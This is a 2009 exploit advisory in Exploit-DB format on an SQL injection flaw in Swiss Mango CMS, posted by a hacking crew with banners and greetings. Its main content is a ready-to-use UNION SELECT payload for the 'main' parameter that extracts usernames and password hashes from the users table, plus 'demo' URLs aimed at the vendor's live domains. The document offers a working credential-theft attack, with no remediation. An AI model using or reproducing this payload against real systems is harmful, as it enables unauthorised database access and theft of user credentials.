Swiss Mango CMS - SQL Injection

EDB-ID:

9824

CVE:

N/A


Author:

kaMtiEz

Type:

webapps


Platform:

PHP

Date:

2009-09-24


#############################################################################################################
## SwissmangoCMS SQL injection vulnerability 	                                                           ##
## Author : kaMtiEz (kamzcrew@gmail.com)								   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date : September 24, 2009 									   	   ##
#############################################################################################################
# Hello My Name Is :                                                                                       ##
#  __               _____   __  ._____________                                                             ##
# |  | _______     /     \_/  |_|__\_   _____/_______                                                      ##
# |  |/ /\__  \   /  \ /  \   __\  ||    __)_\___   /                                                      ##
# |    <  / __ \_/    Y    \  | |  ||        \/    /                                                       ##
# |__|_ \(____  /\____|__  /__| |__/_______  /_____ \                                                      ##
#      \/     \/         \/                \/      \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=-             ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://dev.swissmango.com/
[+] Download : http://dev.swissmango.com/
[+] version : -
[+] Vulnerability : SQL injection
[+] Dork : -
[+] Location : INDONESIA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/index.php?main=[INDONESIANCODER]

[ Exploit ]

666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users--

[ Demo ]

http://dev.swissmango.com/index.php?main=666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users--

http://cms.swissmango.com/demos/business/index.php?main=666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users--

[NB] : u can see in the login and password hash in error mode ;P

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!

[ NOTE ] 

[+] makasih buad babe and enyak .... muach ..
[+] makasih buat om tukulesto dan arianom yg menemani saia selalu dan enggak bosen ma gue .. hahaha
[+] aurakasih cintailah akuw ... :p